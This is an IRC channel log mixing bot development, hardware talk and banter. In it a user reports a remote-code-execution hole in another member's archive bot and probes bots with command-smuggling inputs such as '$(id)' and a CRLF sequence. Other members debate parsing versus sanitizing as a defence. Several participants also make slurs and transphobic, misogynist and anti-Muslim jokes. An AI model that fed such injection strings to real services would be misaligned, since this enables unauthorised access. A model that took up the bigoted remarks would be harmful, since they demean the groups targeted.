mircea_popescu, it's good timing, since I've been doing some reading ircbot code and comparing with my own implementation. I've actually been contemplating http://btcbase.org/log/2018-02-26#1786288 and rolling my own was not a wholly useless endeavour, i.e. http://trilema.com/2016/how-to-participate-in-the-affairs-of-the-most-serene-republic/#selection-322.0-322.5 so I'll document the whole thing on the blog.

15:46

Logged on 2018-02-26 17:11 mircea_popescu: spyked the bot is a solved problem, genesis and all.

15:47

cool.

15:49

http://qntra.net/2018/04/british-government-lab-admits-no-evidence-for-scandal-used-to-blow-up-diplomatic-relations-and-court-european-sympathy/ << Qntra - British Government Lab Admits No Evidence For Scandal Used To Blow Up Diplomatic Relations And Court European Sympathy

15:51

BingoBoingo mind redirecting www to . sometime too ?

15:51

umm qntra down ??

15:52

mircea_popescu: Sure, I will take a look at it

15:52

try without the www

15:52

or nm worx

15:52

http://btcbase.org/log/2018-04-03#1792608 kek

15:52

Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png

15:54

"in natural languages, we are used to context. indeed, contextual meaning is what makes natural languages natural. we have `list' as a verb, and we have `list' as a noun. we have `listless' as an adjective describing something (like a programming language) that does not have lists, and an adjective describing someone who is sort of permanently tired. when we need to disambiguate, we do so with more words."

15:54

this actually misses the all-important mechanism. "when we need to disambiguate, we add more words such as to contradict one of the two possible solutions the string could eval to"

15:55

whole fucking natural language is nothing beyhond "add aix^i terms until the damned P has only one real root."

15:58

and "default" is not a perfectly reasonable variable name holy shit. is this guy going to name his daughter "Cunt" ?

16:02

asciilifeform http://p.bvulpes.com/pastes/KLT6U/?raw=true

~ 16 minutes ~

16:19

mircea_popescu: yay! and yes.

16:20

2 per crate.

16:20

cool.

~ 44 minutes ~

17:04

> Bans gun videos, gets live-action shooting instead http://archive.is/NyMvo

17:06

shinohai: https://archive.is/TgtPb << breitbart didn't neglect the "wearing a headscarf" deets

17:07

Allah snackbar!

17:07

'We are seeing @YouTube employees being brought out with hands up!' << lol

17:07

they didn't offer up their assholes quick enough?

17:14

heh

~ 29 minutes ~

17:44

http://trilema.com/2018/on-namespaces/ << Trilema - On namespaces

17:48

glad work is over

17:48

Fucking had this dude from work looking over my shoulder

17:49

asking questions about everything I type in my terminal

17:51

what sort of chickenfarm do you work in lol

17:52

Most of the people there are alright

17:52

This is just new kid who just likes asking too many questions

17:52

damn i had nfi douchebag were chained to an oar. suxx.

17:52

and doesn't understand it's considered disrespectful to stare at someone elses computer screen

17:53

nfi?

17:54

no fucking idea

17:54

ahh

17:55

Yeah no it was fine most of the day, this kid would just get out of his seat and stand behind me and start staring at what I was doing and asked a bunch of questions

17:59

how about that shooting though

17:59

so much for mass shooting being a men only sort of deal

18:01

bbut lead is banned in californistan!111

18:01

what nao, ban tits ?

18:04

lolol

18:04

asciilifeform: Only womens tits

18:04

Tranny tits are a-okay in California

18:15

basically "liberation" and "4th wave feminism" consists of a bunch of male dweebs with no utility that nobody wants appropriating feminity and taking over boobs.

18:15

ain't enough they kicked women out of the last well paying job available to them (nursing), now they're gonna steal the tits, too ?

18:17

lol waitasec this was a trans-postal?

18:19

nfi, i was discussing the "women in tech" trend generally.

18:19

aa

18:20

there's by now a large and visible class of dweebs who considered the "should i learn github or get boobs" dilemma and came out with "better get boobs -- govt pays for it."

18:20

Men need to stop acting like women and women need to stop acting like men, imo

18:20

men can't stop acting like women -- there's really nothing else for them.

18:23

in other 'holyfuq, chinesium', 1500000 (!) baud default uart.

18:24

*

asciilifeform in fact was not able to find a single usb uart that will reliably rx it: had to use logic analyzer

18:38

*

asciilifeform did in the end find one : ye olde ft232

18:48

http://therealbitcoin.org/ml/btc-dev/2018-April/000295.html << ty jurov for handling donation, cheers! [~]D

18:55

Hey, thanks for your donation shinohai!

18:55

cheers as well! o7

19:06

just buy the fucking water filters already

~ 30 minutes ~

19:36

oy, yup this is the spoofed user agent that the phantomjs portion of the process was using. RCE was happening both at the bash level AND via the headless browser.. I got poked in several orifices >> http://btcbase.org/log/2018-04-03#1792665

19:36

Logged on 2018-04-03 19:52 a111: Logged on 2018-04-03 19:20 douchebag: https://i.imgur.com/S18PzjG.png

19:36

!!v B7975B7CA5C064DEC53DCE43D14C35C0F1D735FB0F849EE418B922F3A81502F5

19:36

lobbes rated douchebag 2 << exploited several security holes in my archive process, but was nice enough to tell me rather than pwn me

19:37

<3

19:37

lobbes: Mind sharing the source code? I could perhaps help you identify further exploits

19:37

i wonder

19:39

!!ratings douchebag

19:39

http://p.bvulpes.com/pastes/AhSME/?raw=true

19:39

!!reputation douchebag

19:39

http://p.bvulpes.com/pastes/xgnGJ/?raw=true

19:40

my plan tonight is to go through and map out whole process (I'll probably tar up my code after I attempt to sanitize inputs), will bake a blog post exposing my naivete to forum at large

19:40

I gotta learn somehow

19:41

mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there?

19:41

dont be so hard on self, supbybot/limnoria is broken so beautifully anyway

19:41

lobbes: I'll help you make your bot more secure

19:42

ty douchebag! much appreciated

19:42

and shinohai, as much as I'd like to blame this on supybot, this one is all me (the exploited code was all brewed by yours truly)

19:43

Just tell me essentially what it is you're trying to do, what you have already tried, and then I'll suggest you how to write it properly

19:43

O.o nb lobbes

19:47

douchebag well, it is very convoluted atm. besides, I'd rather there be a static page I can point to than just barfing it in the logs

19:48

I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648

19:48

Logged on 2018-04-03 19:41 mircea_popescu: oh, and : lobbes other than the design review, consider lifting the whole of gutenberg into your archive ? the idiots already have a https that is broken, so far http only works but who knows how long.

19:48

*

lobbes bbl food

19:48

Forsure, I'm rather experience with application design from a security prespective so just let me know if you have any questions

19:49

Just make sure a problem like that doesn't occur again. Remote code execution is just as bad as it can get

19:51

heh, meanwhile, all of sexual reproduction is based on getting those RCEs

19:51

trinque: That's true

19:53

and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children

19:53

PWN BOXES 2 HELP THE CHILDREN

19:54

why, is that's what sperm do, my man.

19:56

eventually

19:56

http://btcbase.org/log/2016-09-17#1543393 << thread

19:56

Logged on 2016-09-17 02:55 mircea_popescu: trinque fancy that, you had to have someone tell you! nature teaches by example, you stick more data into woman each time than you ever did into all machines you ever touched. yet...

19:56

trinque: What other bots are in here besides lobbes and deedbot

19:56

pehbot !

19:56

whats the syntax

19:56

^ and mimisbrunnr

19:57

!!up pehbot

19:57

pehbot voiced for 30 minutes.

19:57

also syntax for mimisbrunnr

19:57

!A help

19:57

asciilifeform: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32.

19:57

I think mimisbrunnr only quotes log-lines; it's ben_vulpes'

19:58

!#s pehbot

19:58

98 results for "pehbot", http://btcbase.org/log-search?q=pehbot

19:58

^ see also.

20:00

!#s $(id)

20:00

0 results for "$(id)", http://btcbase.org/log-search?q=$%28id%29

20:00

http://btcbase.org/log/2018-04-03#1792659 << fixed

20:00

Logged on 2018-04-03 19:51 mircea_popescu: BingoBoingo mind redirecting www to . sometime too ?

20:02

!#help

20:02

!#h

20:03

!A 'help

20:03

douchebag: EGGOG: Pos: 0: Stack Underflow!

20:03

!A ''help

20:03

douchebag: EGGOG: Pos: 0: Stack Underflow!

20:03

!A help

20:03

douchebag: I am PehBot. See also http://www.loper-os.org/?p=2051 . My Width is currently fixed to 256 and Height to 32.

20:03

any chance this can be done in pm asciilifeform ?

20:03

^

20:03

before someone gets cranky?

20:03

I agree

20:03

to late

20:03

trinque: not as such. BUT he really oughta build the proggy and do in his own shell.

20:04

there ya go.

20:04

kk

20:05

can I try one last command really quick?

20:05

sure?

20:05

!#s \r\nTEST

20:05

0 results for "\\r\\nTEST", http://btcbase.org/log-search?q=%5Cr%5CnTEST

20:06

Good job stripping them !

20:06

actually, douchebag , it does no such thing

20:06

well, pehbot that is

20:06

I was talking about a111

20:07

aa

20:07

If those lines weren't stripped I could potentially send my own commands to the ircd

20:07

i've temporarily moved it to #asciilifeform-test, douchebag , justforyou !

20:08

thx <3

20:08

plz join.

20:11

which reminds me that i should implement the help feature, a111 is no conformant at the moment

20:17

douchebag: a111 logs, speaks logs, responds to #!s #!seen #!seenbefore #!born and #!vulpes

20:18

of which only #!s and #!seen are useful, and #!born mildly interesting

20:18

#!born douchebag

20:18

!#born douchebag

20:18

2018-01-11 <douchebag> douchebag

20:18

http://btcbase.org/log/2018-01-11#1768869

20:20

http://btcbase.org/log/2018-04-03#$(id)

20:21

well, since we're testing things http://btcbase.org/log/2018-04-03#1231231231231

20:22

phf: What sort of topics do you primarily focus on?

20:23

In regards to programming/security/technology ect..

20:29

it really depends on when

20:30

but relevant to the conversation, i grew up in russia in the 90s, so i did infosec until 2005 or so

20:34

there might be an xss somewhere in btcbase, but highly unlikely

20:35

i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues

↖ ↖

20:37

so cl-irc isn't "stripping away" faulty sequences, there's a state machine parser there that only accepts a valid irc protocol, likewise the renderer is not escaping html, instead the dom is constructed server side and where you have strings, you can only have strings. they will be serialized into html according to html escaping rules.

20:46

phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far

20:48

going by the log in #asciilifeform-test, d00d 1) still refuses to actually read the proggy 2) continues to think that it remaining standing has something at all to do with 'sanitizing' or anticipating whatever attack

20:49

I've never programmed in the language it was written in

20:50

So it makes it a bit difficult

20:50

being one of the few languages with actual docs, and of which i used a deliberately small subset -- oughta be pretty simple.

20:51

( oop for instance is not used. nor is heap allocation . )

21:06

meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.'

21:06

and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure.

~ 32 minutes ~

21:38

so, this is kind of like the "default-deny" philosophy? "you may only build the house from this valid list of materials" versus "grab any material you can find, but watch out for this list of lethal building materials"? >> http://btcbase.org/log/2018-04-04#1792809

21:38

Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues

~ 20 minutes ~

21:59

the grammar asserts what ought to be there; it rejects everything else, but it didn't reject the "all else" item by item.

22:01

hm yeah, applying this to my case: there is only ONE point where user-entered data enters into the process, and that is where the bot snarfs from the chan and inserts into the first sqlite3 db. So really, I just need to teach THAT part of my process what a valid url is, and then parse accordingly

22:01

parser implements a given grammar, turning a string (whether considered as text or raw bits) into an abstract syntax tree

22:03

hm okay, this is a bit over my head, but you are saying that I need to understand what the grammar for a url is, and then have the parser follow that grammar?

22:08

lobbes: Why not completely avoid sending any user input to a bash interpreter at all?

22:09

well, it seems like phf's (and others') approach is slightly saner. Even if user input doesn't go to bash, well.. what about the phantomjs exploit you found

22:09

I cannot possibly enumerate what I haven't thought of

22:10

but I CAN enumerate a valid url

22:11

sure douchebag, not saying do that either

22:12

yeah, true, I really should do both

22:19

there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything

22:19

ala deedbot and other items

22:30

hey trinque , i was attempting a gentoo , and found that i cannot even extract a 2016 stage3 on a sane box because --xattrs-include='*.*' and my tar has nfi what xattrs are

22:30

trinque: any idea when this liquishit crept in ?

22:30

what's the most recent stage3 that hasn't got it ?

~ 18 minutes ~

22:48

http://btcbase.org/log/2018-04-03#1792728 << yes, actually. x could not be y, but opt to not-not be y. is this bad ?

22:48

Logged on 2018-04-03 23:41 phf: mircea_popescu: "Unlike obligate coprophagiacs, subsistence hunters could not be stone age fucktards, but for whatever reason opt not to." is there a double not in there?

22:49

incidentally trinque do you know of a musltronic stage3 for arm ?

22:52

http://btcbase.org/log/2018-04-03#1792736 << it's not that big. but, if indeed it is that big this is a reason to find more storage space, can't really cut them off.

22:52

Logged on 2018-04-03 23:48 lobbes: I agree this needs archiving (I'm currently working off their version of kritik der reinen vernunft as a german study aid). However, unlike kibo.com I would wager the entirety of gutenberg is much much larger. I'd prolly need moar storage than the ~200gb ssd on the dedicated home craptop I'm currently using (but maybe not) >> http://btcbase.org/log/2018-04-03#1792648

22:53

http://btcbase.org/log/2018-04-03#1792743 << bwahaha wut.

22:53

Logged on 2018-04-03 23:53 douchebag: and I'll tell you why, when working for a company doing a security audit - you will get paid the most for RCE. Women love money, and that money can be used to help take care of the children

22:54

!!up candi_lustt

22:54

candi_lustt voiced for 30 minutes.

22:54

^ there douchebag , now you can learn lips.

22:55

and in other "best villains of the silver screen", https://www.youtube.com/watch?v=-N9LnkKQfuc

22:57

#!born douchebag

22:58

!#born phf

22:58

2014-03-20 <phf> not quite

22:58

http://btcbase.org/log/2014-03-20#570859

22:58

phf it's supposed to produce no more than one line per command.

23:00

http://btcbase.org/log/2018-04-04#1792811 << this is not something that can be "grasped" as such.

23:00

Logged on 2018-04-04 00:46 asciilifeform: phf: i was vaguely hoping he might grasp this by playing with pehbot / reading ffa ; but loox like no dice so far

23:01

much in the vein astronomy can not be grasped playing with ptolemaic spheres.

23:01

http://btcbase.org/log/2018-04-04#1792809 << links ? hm ? HM ?

23:01

Logged on 2018-04-04 00:35 phf: i did several talks on the idea that sanitizing data is retarded, and that you're supposed to have a proper parsing strategy instead. that it's in other words an impedance mismatch problem, and if you teach computer your assumptions it will be impossible to have injection issues

23:02

i mean my talk to ro politicians about basic economics from like 2005 is on the fucking web ffs!

23:02

and the time i burned the koran/bible and the time i stabbed that rabbit and so following.

23:02

*

asciilifeform actually watches the 2005 one , it was lulzy

23:02

*watched

23:03

dja understand what it says ?

23:03

at the time understood maybe half . really oughta rewatch these days

23:04

http://trilema.com/2009/banii-oamenii-si-valorile-liberale/ << uncharacteristically for vloggers, transcript is available.

23:04

oh hah.

23:04

this almost takes out all the sport tho.

23:04

myeah.

23:10

incidentrally, the comments are something else.

23:11

http://p.bvulpes.com/pastes/LsmJG/?raw=true << d00d's total effort in re pehbot , thus far.

23:12

im sure he'll say something if he finds something neh

23:12

doesn't show any symptoms of approaching the thing in any way other than http://btcbase.org/log/2016-05-01#1460013

23:12

Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS ; and so does "GET /blog/blog-config.php~".

23:23

eh, what;'s the rush.

23:24

http://btcbase.org/log/2018-04-04#1792817 << fuck 'em. let them sell to each other for bitpaybux until they fall over for all i care.

23:24

Logged on 2018-04-04 01:06 asciilifeform: meanwhile, in sads, RK3328 ( and in fact every arm cpu in production ) won't boot without a ~1MB evil blob (that in fact runs on dedicated evil-core, just like intel's ME . ) so much for 'published errything.'

23:24

http://btcbase.org/log/2018-04-04#1792818 << the english web is empty of EVERYTHING. there isn't anything there. i looked.

23:24

Logged on 2018-04-04 01:06 asciilifeform: and, interestingly, the entire public net appears to be EMPTY of ANY discussion of a cure.

23:25

mircea_popescu: it's chinese, therefore lulzy. mine seems to boot up with the shitrom broken...

23:25

yes but it probably doesn't have $random-useless-feature!!1

23:26

boots -- believe or not -- a gentoo.

23:26

as of 5min ago.

23:26

http://btcbase.org/log/2018-04-04#1792831 << this is the worst choice, in general.

23:26

Logged on 2018-04-04 02:19 lobbes: there's also an additional precaution I could take: instead of the thing being on an hourly cronjob, I could easily set up a quick 'validation report' for myself and then pull a 'manual' crank to initiate everything

23:28

http://btcbase.org/log/2018-04-04#1792834 << ext4

23:28

Logged on 2018-04-04 02:30 asciilifeform: trinque: any idea when this liquishit crept in ?

23:28

fwiw, iirc reiserfs has them too.

23:28

it's in tar.

23:28

from 1.27 and up.

23:29

q for trinque was , when did gentoo stage3 start using this 'feature'.

23:29

probably once they started supporting ext4.

23:29

anyway, odds are you can just take it out.

23:29

nope. $box supports ext4 , but tar 1.26.

23:29

just drop the flag, see what happens.

23:30

and i untarred in spite of this oddity, and the only barf was that python, ping, and cc1 binaries failed to extract. but oddly enuff extracted later manually...

23:30

and appear to work

23:31

anyway. extended attributes is this ~dead standard that got implemented anyway, basically a kludgy extension of chown.

23:31

*

asciilifeform did realize this

23:31